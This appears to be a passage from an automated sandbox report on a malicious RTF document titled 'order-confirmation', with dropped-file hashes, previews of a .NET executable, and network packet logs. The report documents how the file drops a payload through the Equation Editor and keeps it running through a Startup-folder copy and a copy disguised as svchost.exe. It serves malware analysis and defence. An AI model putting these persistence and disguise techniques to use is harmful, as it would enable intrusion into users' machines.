                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQMPNABY0K5OG854FLRQ.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VGKNL7NXF46SPGFU4DMH.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X1M228ROQIQ3IHOS0OJU.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y4573HUSZC8AOEOMJABO.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                      Process:C:\Users\user\AppData\Roaming\srt.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3777536
                                                      Entropy (8bit):2.5622413210602293
                                                      Encrypted:false
                                                      SSDEEP:768:MnLGH0oPWsQPNIF2wMxBH1R1Cr8h68EyWgloa1muQtN5Cc/5wMhb93IuWl5FeQ1g:YWQ6F2Jf6
                                                      MD5:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      SHA1:2EF9AA9BE30282A264FCA77C52DBC0F77EB09A0F
                                                      SHA-256:F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                                                      SHA-512:E92B6447388BA357D616C04D57C73CEC71166CA241B74DB99C348000F0CDD1B5F89937B81114A27CE800F5F22579F7C86D7C7B6F7E78FA9434615B1231FBC8A8
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Joe Sandbox View:
                                                      • Filename: Order Confirmation.doc, Detection: malicious, Browse
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p............"...0...9.........~.9.. ....9...@.. ........................:...........`.................................$.9.W.....9.@.....................9...................................................... ............... ..H............text.....9.. ....9................. ..`.rsrc...@.....9.......9.............@..@.reloc........9.......9.............@..B................`.9.....H........$....9..........................................................*".(.....*..(........}......}.......( ...}.......}....*".(.....*....0..8..........rx..p..r.q9p.......%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%..r.q9p.(#........+3+... .......o..........(.....(....o.......X.....X......o....2........%.. .o.....s............+L..........o...........,.+,..r)..p(........,.+...(....(.........o.........X.......i2..o.........(.....*.0..............
                                                      C:\Users\user\AppData\Roaming\srt.exe
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3777536
                                                      Entropy (8bit):2.5622413210602293
                                                      Encrypted:false
                                                      SSDEEP:768:MnLGH0oPWsQPNIF2wMxBH1R1Cr8h68EyWgloa1muQtN5Cc/5wMhb93IuWl5FeQ1g:YWQ6F2Jf6
                                                      MD5:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      SHA1:2EF9AA9BE30282A264FCA77C52DBC0F77EB09A0F
                                                      SHA-256:F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                                                      SHA-512:E92B6447388BA357D616C04D57C73CEC71166CA241B74DB99C348000F0CDD1B5F89937B81114A27CE800F5F22579F7C86D7C7B6F7E78FA9434615B1231FBC8A8
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Joe Sandbox View:
                                                      • Filename: Order Confirmation.doc, Detection: malicious, Browse
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p............"...0...9.........~.9.. ....9...@.. ........................:...........`.................................$.9.W.....9.@.....................9...................................................... ............... ..H............text.....9.. ....9................. ..`.rsrc...@.....9.......9.............@..@.reloc........9.......9.............@..B................`.9.....H........$....9..........................................................*".(.....*..(........}......}.......( ...}.......}....*".(.....*....0..8..........rx..p..r.q9p.......%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%..r.q9p.(#........+3+... .......o..........(.....(....o.......X.....X......o....2........%.. .o.....s............+L..........o...........,.+,..r)..p(........,.+...(....(.........o.........X.......i2..o.........(.....*.0..............
                                                      C:\Users\user\Desktop\~$der-confirmation.doc__.rtf
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.431160061181642
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                      C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                                                      Process:C:\Users\user\AppData\Roaming\srt.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3777536
                                                      Entropy (8bit):2.5622413210602293
                                                      Encrypted:false
                                                      SSDEEP:768:MnLGH0oPWsQPNIF2wMxBH1R1Cr8h68EyWgloa1muQtN5Cc/5wMhb93IuWl5FeQ1g:YWQ6F2Jf6
                                                      MD5:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      SHA1:2EF9AA9BE30282A264FCA77C52DBC0F77EB09A0F
                                                      SHA-256:F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                                                      SHA-512:E92B6447388BA357D616C04D57C73CEC71166CA241B74DB99C348000F0CDD1B5F89937B81114A27CE800F5F22579F7C86D7C7B6F7E78FA9434615B1231FBC8A8
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Joe Sandbox View:
                                                      • Filename: Order Confirmation.doc, Detection: malicious, Browse
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p............"...0...9.........~.9.. ....9...@.. ........................:...........`.................................$.9.W.....9.@.....................9...................................................... ............... ..H............text.....9.. ....9................. ..`.rsrc...@.....9.......9.............@..@.reloc........9.......9.............@..B................`.9.....H........$....9..........................................................*".(.....*..(........}......}.......( ...}.......}....*".(.....*....0..8..........rx..p..r.q9p.......%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%..r.q9p.(#........+3+... .......o..........(.....(....o.......X.....X......o....2........%.. .o.....s............+L..........o...........,.+,..r)..p(........,.+...(....(.........o.........X.......i2..o.........(.....*.0..............

                                                      Static File Info

                                                      General

                                                      File type:Rich Text Format data, unknown version
                                                      Entropy (8bit):4.501077473190299
                                                      TrID:
                                                      • Rich Text Format (5005/1) 55.56%
                                                      • Rich Text Format (4004/1) 44.44%
                                                      File name:order-confirmation.doc__.rtf
                                                      File size:5082
                                                      MD5:3d081d1bd8aa121b56754528d7b13981
                                                      SHA1:87db49098bc0aa0b88dfa5c7f3954544dd3058df
                                                      SHA256:4435554b4906c5a294e08a579a0bd6e7ae78bd0dcce24a7225a29ab2a731bd28
                                                      SHA512:5376f5904e8780cf94ca240a98649d462c2d61d6222fb538a8e8de85aed995c6ab3ba72c24dbeca067d9587c19e772af424df4d75e7323ea519cbc99bed78b4f
                                                      SSDEEP:96:Kdt9KksmzFk1O0kkMAfnvNqJxlmaPsQ20/89yN+/32e7cfRTbw:MXK4CO0N9fvNQxQ+sQ20EcN82eKRTbw
                                                      File Content Preview:{\rtf8108{\object74080923 74080923 \'' \objlink13327119\objupdate6343720963437209 \objw4254\objh6162{\*\objdata96259 {{{{{{{{{{{{{{{{{{{{{{{{\bin000000 {\*\obj

                                                      File Icon

                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                      Static RTF Info

                                                      Objects

                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                      000000104hno
                                                      1000000CEh2embeddedEQUAtIon.32096no

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 27, 2021 21:42:23.914244890 CEST4916780192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:23.955931902 CEST8049167162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:23.956078053 CEST4916780192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:23.956628084 CEST4916780192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:23.998287916 CEST8049167162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.015337944 CEST8049167162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.017301083 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.058856964 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.058929920 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.072005987 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.114135981 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.122555017 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.122575045 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.122585058 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.122689009 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.139714003 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.181204081 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.181384087 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.224595070 CEST4916780192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.263251066 CEST8049167162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.263396025 CEST4916780192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.380567074 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.421641111 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.465070009 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.482489109 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.482548952 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.482605934 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.482645988 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.482664108 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.482685089 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.482701063 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.482726097 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.482785940 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.483345032 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.483390093 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.483457088 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.484296083 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.484343052 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.484477997 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.485277891 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.485321045 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.485387087 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.486263990 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.486323118 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.486383915 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.487210989 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.487263918 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.487325907 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.488177061 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.488220930 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.488325119 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.489146948 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.489190102 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.489276886 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.490128040 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.490179062 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.490236998 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.491168022 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.491224051 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.491290092 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.492054939 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.492100000 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.492170095 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.493077993 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.493135929 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.493205070 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.494004965 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.494048119 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.494112968 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.494982958 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.495024920 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.495083094 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.495959044 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.496002913 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.496067047 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.524369001 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.524416924 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.524487019 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.524863005 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.524918079 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.525110960 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.525783062 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.525836945 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.525897980 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.526740074 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.526793003 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.526968002 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.527730942 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.527777910 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.527847052 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.528665066 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.528719902 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.528778076 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.529686928 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.529737949 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.529793024 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.530621052 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.530666113 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.530720949 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.531646013 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.531698942 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.531748056 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.532568932 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.532612085 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.532671928 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.533535004 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.533576012 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.533641100 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.534606934 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.534648895 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.534720898 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.535473108 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.535593987 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.535665035 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.536425114 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.536464930 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.536526918 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.537420034 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.537462950 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.537533998 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.538397074 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.538440943 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.538500071 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.539381027 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.539422035 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.539482117 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.540352106 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.540394068 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.540510893 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.541296005 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.541333914 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.541404963 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.542283058 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.542325974 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.542408943 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.543256998 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.543313026 CEST44349168162.159.130.233192.168.2.22
